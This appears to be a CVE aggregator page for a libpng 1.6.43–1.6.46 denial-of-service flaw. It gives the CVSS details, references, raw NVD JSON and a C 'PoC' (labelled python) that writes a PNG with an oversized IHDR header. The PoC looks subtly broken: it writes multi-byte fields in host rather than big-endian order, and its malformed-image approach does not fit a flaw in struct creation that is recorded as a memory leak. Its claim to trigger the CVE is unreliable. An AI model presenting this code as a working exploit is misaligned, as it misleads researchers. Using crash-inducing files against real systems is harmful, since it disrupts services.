CVE-2025-28164

Description

Buffer Overflow vulnerability in libpng 1.6.43-1.6.46 allows a local attacker to cause a denial of service via png_create_read_struct() function.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:libpng:libpng:*:*:*:*:*:*:*:* - VULNERABLE

libpng 1.6.43

libpng 1.6.44

libpng 1.6.45

libpng 1.6.46

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// PoC for CVE-2025-28164: libpng png_create_read_struct() Buffer Overflow
// This PoC creates a malformed PNG file with oversized IHDR dimensions

#pragma pack(1)
typedef struct {
    unsigned int length;
    char type[4];
    unsigned int width;
    unsigned int height;
    unsigned char bit_depth;
    unsigned char color_type;
    unsigned char compression;
    unsigned char filter;
    unsigned char interlace;
    unsigned int crc;
} ihdr_chunk_t;

void write_png_header(FILE *fp) {
    // PNG signature
    unsigned char signature[8] = {0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A};
    fwrite(signature, 1, 8, fp);
}

unsigned int calculate_crc32(unsigned char *data, int length) {
    unsigned int crc = 0xFFFFFFFF;
    for (int i = 0; i < length; i++) {
        crc ^= data[i];
        for (int j = 0; j < 8; j++) {
            crc = (crc >> 1) ^ (0xEDB88320 & -(crc & 1));
        }
    }
    return ~crc;
}

void write_malformed_ihdr(FILE *fp) {
    ihdr_chunk_t ihdr;
    
    // Malicious oversized dimensions to trigger buffer overflow
    ihdr.length = 13;  // IHDR data length
    memcpy(ihdr.type, "IHDR", 4);
    ihdr.width = 0x7FFFFFFF;  // Oversized width value
    ihdr.height = 0x7FFFFFFF; // Oversized height value
    ihdr.bit_depth = 8;
    ihdr.color_type = 2;      // RGB
    ihdr.compression = 0;
    ihdr.filter = 0;
    ihdr.interlace = 0;
    
    // Calculate CRC for type + data
    unsigned char ihdr_data[17];
    memcpy(ihdr_data, ihdr.type, 4);
    memcpy(ihdr_data + 4, &ihdr.width, 4);
    memcpy(ihdr_data + 8, &ihdr.height, 4);
    ihdr_data[12] = ihdr.bit_depth;
    ihdr_data[13] = ihdr.color_type;
    ihdr_data[14] = ihdr.compression;
    ihdr_data[15] = ihdr.filter;
    ihdr_data[16] = ihdr.interlace;
    
    ihdr.crc = calculate_crc32(ihdr_data, 17);
    
    // Write chunk length, type, data, and CRC
    fwrite(&ihdr.length, 4, 1, fp);
    fwrite(ihdr.type, 4, 1, fp);
    fwrite(&ihdr.width, 4, 1, fp);
    fwrite(&ihdr.height, 4, 1, fp);
    fwrite(&ihdr.bit_depth, 5, 1, fp);
    fwrite(&ihdr.crc, 4, 1, fp);
}

void write_iend(FILE *fp) {
    unsigned int length = 0;
    unsigned int crc = 0xAE426082;  // CRC of "IEND"
    
    fwrite(&length, 4, 1, fp);
    fwrite("IEND", 4, 1, fp);
    fwrite(&crc, 4, 1, fp);
}

int main(int argc, char *argv[]) {
    if (argc != 2) {
        printf("Usage: %s <output_png_file>\n", argv[0]);
        return 1;
    }
    
    FILE *fp = fopen(argv[1], "wb");
    if (!fp) {
        perror("Failed to open output file");
        return 1;
    }
    
    write_png_header(fp);
    write_malformed_ihdr(fp);
    write_iend(fp);
    
    fclose(fp);
    printf("Malformed PNG created: %s\n", argv[1]);
    printf("This file triggers CVE-2025-28164 in libpng versions 1.6.43-1.6.46\n");
    
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-28164
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-28164
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-28164/
[4] VulDB https://vuldb.com/cve/CVE-2025-28164
[5] https://gist.github.com/kittener/506516f8c22178005b4379c8b2a7de20
[6] https://github.com/pnggroup/libpng/issues/655

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-28164", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:14.760", "lastModified": "2026-03-04T19:42:07.987", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Buffer Overflow vulnerability in libpng 1.6.43-1.6.46 allows a local attacker to cause a denial of service via png_create_read_struct() function."}, {"lang": "es", "value": "Vulnerabilidad de desbordamiento de búfer en libpng 1.6.43-1.6.46 permite a un atacante local causar una denegación de servicio a través de la función png_create_read_struct()."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libpng:libpng:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.6.43", "versionEndIncluding": "1.6.46", "matchCriteriaId": "A0F7AAC0-79B6-4C89-A7F1-E61C24B0A5A7"}]}]}], "references": [{"url": "https://gist.github.com/kittener/506516f8c22178005b4379c8b2a7de20", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/pnggroup/libpng/issues/655", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}